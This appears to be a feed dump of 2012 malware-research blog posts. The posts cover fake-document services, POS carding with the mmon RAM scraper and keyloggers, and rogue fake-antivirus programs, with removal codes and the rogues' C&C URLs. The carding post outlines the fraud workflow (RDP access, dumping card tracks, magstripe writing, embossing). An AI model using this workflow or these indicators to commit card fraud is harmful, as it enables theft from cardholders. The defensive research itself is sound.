src="http://3.bp.blogspot.com/-1gGKNJN82qI/T1ZMVn47bQI/AAAAAAAAFXo/joOcvtImmMQ/s400/Fake_passports.PNG" width="400" /></a></div><br />Service for various fake documents by vengativ0 (car documents, driving license...)<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-n7orW1txHP0/T1ZUAicrnHI/AAAAAAAAFYA/WWZKohZmI0E/s1600/FakeDocs.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="287" src="http://3.bp.blogspot.com/-n7orW1txHP0/T1ZUAicrnHI/AAAAAAAAFYA/WWZKohZmI0E/s400/FakeDocs.PNG" width="400" /></a></div><br /><span id="goog_753405284"></span><span id="goog_753405285"></span><br />Fake ID Cards service<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-MbnF90oK0Kg/T1ZNk-IErkI/AAAAAAAAFXw/lvqak9u6t2U/s1600/elite_soldier.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="157" src="http://4.bp.blogspot.com/-MbnF90oK0Kg/T1ZNk-IErkI/AAAAAAAAFXw/lvqak9u6t2U/s400/elite_soldier.PNG" width="400" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-oYcF44VQwSM/T1ZL5YuIl8I/AAAAAAAAFXg/YS-kLHL1LSA/s1600/elitsoldier_fake_CIF.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="246" src="http://4.bp.blogspot.com/-oYcF44VQwSM/T1ZL5YuIl8I/AAAAAAAAFXg/YS-kLHL1LSA/s400/elitsoldier_fake_CIF.PNG" width="400" /></a></div><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5365964245877416061-2230505649964418341?l=www.xylibox.com' alt='' /></div>http://www.xylibox.com/2012/03/plastic-service-and-fake-documents.htmlnoreply@blogger.com (Steven K)4tag:blogger.com,1999:blog-5365964245877416061.post-4281321969888221866Tue, 06 Mar 2012 19:24:00 +00002012-03-06T21:11:18.064+01:00CardingPoint Of SalePOSPOS Carding<div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-sxNYTYdPLT0/T1Yp1g7SxuI/AAAAAAAAFWQ/DxSy6edCZO4/s1600/point_of_sale.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="387" src="http://1.bp.blogspot.com/-sxNYTYdPLT0/T1Yp1g7SxuI/AAAAAAAAFWQ/DxSy6edCZO4/s400/point_of_sale.jpg" width="400" /></a></div><br />I got recently a package of files found in a infected POS (POS hacked due to a weak rdp password)<br /><br /><img border="0" src="http://2.bp.blogspot.com/-Af-I4mHYkuc/T1YfzsGya2I/AAAAAAAAFVo/ubGJ3PUqc4s/s1600/iconsz.PNG" /><br /><br />Interface of a compromised POS used by a jeweller:<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-CpY9LvCk6Yc/T1YzSlXyZ2I/AAAAAAAAFWY/a5EV-e05sJ8/s1600/POS.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="252" src="http://2.bp.blogspot.com/-CpY9LvCk6Yc/T1YzSlXyZ2I/AAAAAAAAFWY/a5EV-e05sJ8/s400/POS.png" width="400" /></a></div><br />out.exe is a Ardamax Keylogger (ardamax.com) and vui qua.exe is a SFX archive who display this picture when executed:<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-O2Yj7ZxM808/T1YiQ5EH5KI/AAAAAAAAFVw/3ck_Z0EnfDI/s1600/45266344-vui-1-a.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="http://2.bp.blogspot.com/-O2Yj7ZxM808/T1YiQ5EH5KI/AAAAAAAAFVw/3ck_Z0EnfDI/s400/45266344-vui-1-a.jpg" width="285" /></a></div><br />And drop Pefect Keylogger (blazingtools.com) behind.<br />"vui qua" might be a Vietnamese phrase which translated is "so funny".<br /><br />These two keyloggers are probably useless for the carder, the interesting file here is "mmon.exe" a ram scraper.<br />It scan each and every process looking for CC dumps thats been written to memory Track 1, 2.<br />If a Point Of Sale device is connected to the computer it will grab it's card data right away.<br />How? POS always use end to end encryption, the only place where it's not encrypted are inside the memory.<br />But.. the memory have limited storage so it overwrites the data all the time.<br />It's also a problem for mmon, because this crap have no loop feature and does not write inside a file.<br />POS Carders usually use better malware than this, but i got this so...<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-JbKOtJXoDa4/T1YkM0gVyRI/AAAAAAAAFV4/KFBFAhs8Wjo/s1600/MMON.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="235" src="http://4.bp.blogspot.com/-JbKOtJXoDa4/T1YkM0gVyRI/AAAAAAAAFV4/KFBFAhs8Wjo/s400/MMON.PNG" width="400" /></a></div>(mmon.exe, "Kartoxa" is probably the distorted version of the word "potato")<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-N9QanAUs7u4/T1Y6rETFkdI/AAAAAAAAFWg/7nuumqp9mUc/s1600/Scan_of_running_process.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="http://1.bp.blogspot.com/-N9QanAUs7u4/T1Y6rETFkdI/AAAAAAAAFWg/7nuumqp9mUc/s400/Scan_of_running_process.PNG" width="191" /></a></div>mmon scanning process.<br /><br />test of mmon with a valid track two in memory<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-VVRuxWvpydQ/T1ZvU5T3z-I/AAAAAAAAFYw/TOX0UEzkMhA/s1600/Valid_track_two_test.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="257" src="http://3.bp.blogspot.com/-VVRuxWvpydQ/T1ZvU5T3z-I/AAAAAAAAFYw/TOX0UEzkMhA/s400/Valid_track_two_test.PNG" width="400" /></a></div><br />When a dump is found, the program do nothing with it, it just display the stuff on console.<br />The bad guys just connect to the POS via RDP, get dumps via mmon and write them out on magnetic stripe with a card writer.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-ellW5sdKUeE/T1Ylx4QQwSI/AAAAAAAAFWA/HgvR2aamfLg/s1600/Magnetic-Card-Reader-and-Writer-Hico-3-Tracks-With-USB-Interface.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="http://2.bp.blogspot.com/-ellW5sdKUeE/T1Ylx4QQwSI/AAAAAAAAFWA/HgvR2aamfLg/s400/Magnetic-Card-Reader-and-Writer-Hico-3-Tracks-With-USB-Interface.jpg" width="400" /></a></div>&nbsp;(MSR606 USB Magnetic Stripe Reader Writer/Encoder)<br /><br />Then use an embosser to make imprinted numbers on the card.<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-Au6JTUBDDic/T1YnPBMLO8I/AAAAAAAAFWI/4o1fEUib9Dg/s1600/embosser.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="367" src="http://1.bp.blogspot.com/-Au6JTUBDDic/T1YnPBMLO8I/AAAAAAAAFWI/4o1fEUib9Dg/s400/embosser.PNG" width="400" /></a></div>(A DXR 70C embosser)<br /><br />And it's ready to use... in USA (Type 101)<br />The ones we have in Europe are 201 cards (pin and chip)<br />101 only need to swipes the card in a store and the cashier checks the 4 last digits on the card if they are corect.<br />Carders also use printers like Fargo to make fake identities.<br />Anyway, a POS malware have a high price, it's not a business that everyone can do.<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5365964245877416061-4281321969888221866?l=www.xylibox.com' alt='' /></div>http://www.xylibox.com/2012/03/pos-carding.htmlnoreply@blogger.com (Steven K)5tag:blogger.com,1999:blog-5365964245877416061.post-7437171989227520853Tue, 06 Mar 2012 19:20:00 +00002012-03-06T20:20:07.395+01:00fakeavAntimalware PC SafetyAntimalware PC Safety<img border="0" src="http://1.bp.blogspot.com/-ZmE6WGiNCxo/T1ZPdMA6HkI/AAAAAAAAFX4/x2TuLO8GupQ/s1600/iconnz.PNG" /><br /><br /><b>Antimalware PC Safety</b> is a fake Antivirus. This rogue displays fake alerts to scare users.<br />It replaces <b>AV Security Essentials</b>, <b>Smart Anti-Malware Protection</b>, <b>Antivirus Smart Protection</b>, <b>Malware Protection Center</b>, <b>Internet Security Guard</b>, <b>Home Security Solutions</b>, <b>Home Safety Essentials</b>, <b>Anti-Malware Lab</b>, <b>System Smart Security</b>, <b>PC Security Guardian</b>, <b>Best Malware Protection</b>, <b>Internet Security Essentials</b>, <b>Smart Internet Protection 2011</b>, P<b>ersonal Internet Security 2011</b>, <b>Personal Security Sentinel</b>, <b>Internet Antivirus 2011</b>, <b>Internet Security Suite</b>, <b>Smart Security</b>, <b>My Security Shield</b>, <b>Security Master AV</b>, <b>My Security Engine</b>, <b>Security Guard</b>, <b>CleanUp Antivirus</b> and <b>Security Antivirus</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-u49p5hQihQw/T1ZhrdAxHrI/AAAAAAAAFYI/BfVQA4PfdVI/s1600/Antimalware.PC.Safety.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="288" src="http://2.bp.blogspot.com/-u49p5hQihQw/T1ZhrdAxHrI/AAAAAAAAFYI/BfVQA4PfdVI/s400/Antimalware.PC.Safety.PNG" width="400" /></a></div><br />To register (and help removal), enter this serial code: <b style="color: red;">P1QM-XG6B-TVAZ-DC4W</b> or <b style="color: red;">U2FD-S2LA-H4KA-UEPB</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-T7PTkCw5Z50/T1ZiXyJs9SI/AAAAAAAAFYo/dx5S3ylMA9g/s1600/dumpedunpack.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="http://4.bp.blogspot.com/-T7PTkCw5Z50/T1ZiXyJs9SI/AAAAAAAAFYo/dx5S3ylMA9g/s400/dumpedunpack.PNG" width="400" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-H_aXiOq98wA/T1ZiCkYksLI/AAAAAAAAFYY/iMtnQ4pl0a0/s1600/antireverse.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="200" src="http://3.bp.blogspot.com/-H_aXiOq98wA/T1ZiCkYksLI/AAAAAAAAFYY/iMtnQ4pl0a0/s400/antireverse.PNG" width="400" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-iDHRsuk1zJk/T1ZiH667INI/AAAAAAAAFYg/BoX-ZrqnRX4/s1600/serial.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="137" src="http://3.bp.blogspot.com/-iDHRsuk1zJk/T1ZiH667INI/AAAAAAAAFYg/BoX-ZrqnRX4/s400/serial.PNG" width="400" /></a></div><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5365964245877416061-7437171989227520853?l=www.xylibox.com' alt='' /></div>http://www.xylibox.com/2012/03/antimalware-pc-safety.htmlnoreply@blogger.com (Steven K)1tag:blogger.com,1999:blog-5365964245877416061.post-8007255907166518710Thu, 01 Mar 2012 22:31:00 +00002012-03-01T23:37:21.496+01:00TritaxWindows Threats DestroyerWindows Threats Destroyer<img border="0" src="http://4.bp.blogspot.com/-v-1GPqrjnXc/T0_6FJUeqrI/AAAAAAAAFVg/vJea3ZqWxVU/s1600/iconz.PNG" /><br /><br /><b>Windows Threats Destroyer</b> is a fake Antivirus. This rogue displays fake alerts to scare users. It replaces <b>Windows Firewall Constructor</b>, <b>Windows Stability Guard</b>, <b>Windows Basic Antivirus</b>, <b>Windows PRO Scanner</b>, <b>Windows Shield Tool</b>, <b>Windows Telemetry Center</b>, <b>Windows Performance Catalyst</b>, <b>Windows Smart Partner</b>, <b>Windows Smart Warden</b>, <b>Windows Functionality Checker</b>, <b>Windows Protection Master</b><br /><br />This rogue is from the same familly as <a href="http://siri-urz.blogspot.com/search/label/Tritax">Tritax</a>, same paker (ASProtect) and same lame shit.<br />Now they just try to imitate 'Security Master AV' GUI, or maybe based on the same code..&nbsp; (i've not the sample anymore)<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-aSkGgGBBSIs/T0_vF6JTZWI/AAAAAAAAFVA/2tfeMdQYJnc/s1600/splash.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="233" src="http://3.bp.blogspot.com/-aSkGgGBBSIs/T0_vF6JTZWI/AAAAAAAAFVA/2tfeMdQYJnc/s400/splash.PNG" width="400" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-HKHnuFznpzs/T0_u8NYDqcI/AAAAAAAAFU4/mFEIXeBYNDk/s1600/Windows.Threats.Destroyer.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="290" src="http://4.bp.blogspot.com/-HKHnuFznpzs/T0_u8NYDqcI/AAAAAAAAFU4/mFEIXeBYNDk/s400/Windows.Threats.Destroyer.png" width="400" /></a></div><br />To register (and help removal), copy paste this code: <b style="color: red;">0W000-000B0-00T00-E0020</b><br />'0' can be anything, and '2' can be replaced by '1', '2' or '3'<br />Sorry, no keygen, no kitten.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-TPVpDkCtWXY/T0_yAr2BZ6I/AAAAAAAAFVQ/o06Zq2NE6zU/s1600/routine.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="http://2.bp.blogspot.com/-TPVpDkCtWXY/T0_yAr2BZ6I/AAAAAAAAFVQ/o06Zq2NE6zU/s400/routine.PNG" width="400" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-5IaDCSrvmKY/T0_4dGN2f1I/AAAAAAAAFVY/j0w_vQ7Yeeo/s1600/1330593870374.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="http://4.bp.blogspot.com/-5IaDCSrvmKY/T0_4dGN2f1I/AAAAAAAAFVY/j0w_vQ7Yeeo/s640/1330593870374.jpg" width="376" /></a></div>Merci siri et Baboon :)<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5365964245877416061-8007255907166518710?l=www.xylibox.com' alt='' /></div>http://www.xylibox.com/2012/03/windows-threats-destroyer.htmlnoreply@blogger.com (Steven K)0tag:blogger.com,1999:blog-5365964245877416061.post-3009745734265185287Wed, 29 Feb 2012 10:02:00 +00002012-02-29T11:07:18.812+01:00Smart Fortress 2012fakeavbestAVSmart Fortress 2012<img border="0" src="http://2.bp.blogspot.com/-O38_WvP1uj0/T03135dZdmI/AAAAAAAAFUg/cr_0DgwwRK4/s1600/icons.PNG" /><br /><br />Accortding to <a href="http://siri-urz.blogspot.com/">S!Ri</a>, <b>Smart Fortress 2012</b> is a fake anti-spyware tool. It displays fake alert messages, prevent execution of legit programs and detects inexistent infections to scare users.<br />It is a clone of <b>Smart Protection 2012</b>, <b>Personal Shield Pro</b>.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-y33_uhlDRQA/T031Ix2K1TI/AAAAAAAAFUQ/VSA-V5FczMQ/s1600/Smart.Fortress.2012.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="298" src="http://3.bp.blogspot.com/-y33_uhlDRQA/T031Ix2K1TI/AAAAAAAAFUQ/VSA-V5FczMQ/s400/Smart.Fortress.2012.png" width="400" /></a></div><br />To register (and help removal), copy paste this code: <b style="color: red;">AA39754E-715219CE</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-afYN4UdxJ0I/T031cVEOBoI/AAAAAAAAFUY/oJvEDPARP1Q/s1600/29-02-2012+10-45-07.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="105" src="http://3.bp.blogspot.com/-afYN4UdxJ0I/T031cVEOBoI/AAAAAAAAFUY/oJvEDPARP1Q/s400/29-02-2012+10-45-07.png" width="400" /></a></div><br />The following urls were found: <br /><div class="text" style="background-color: #f0f0f0; border: 1px solid #d0d0d0; color: #000066; font-family: monospace;">http://78.159.105.142/api/stats/install/?&amp;affid=46701&amp;ver=3030002&amp;group=sp<br />http://95.168.172.86/p/?&amp;aid=test&amp;lid=3030002&amp;affid=46701&amp;nid=9025E786&amp;group=sf<br />http://95.168.172.86/p/gr/?lid=3030002&amp;group=sf&amp;nid=9025E786&amp;s=3&amp;affid=46701&amp;aid=test</div><br />95.168.172.86 was also used by <a href="http://xylibox.blogspot.com/2012/02/win32rovnix.html">Win32/Rovnix</a><br />&nbsp;Here, one again serving FakeAV:<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-83p1zRN1pyg/T034taXyTcI/AAAAAAAAFUw/FgamoTOwAtw/s1600/29-02-2012+11-05-53.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="http://3.bp.blogspot.com/-83p1zRN1pyg/T034taXyTcI/AAAAAAAAFUw/FgamoTOwAtw/s400/29-02-2012+11-05-53.png" width="387" /></a></div><br />Also on my star-stat.com post, someone have do a weird comment claiming to have the source code of this type of FakeAV.<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-ydvG5WZlB_g/T033Xj_m1RI/AAAAAAAAFUo/7g1WOhAMXfo/s1600/68968570.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="http://3.bp.blogspot.com/-ydvG5WZlB_g/T033Xj_m1RI/AAAAAAAAFUo/7g1WOhAMXfo/s400/68968570.png" width="400" /></a></div><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5365964245877416061-3009745734265185287?l=www.xylibox.com' alt='' /></div>http://www.xylibox.com/2012/02/smart-fortress-2012.htmlnoreply@blogger.com (Steven K)1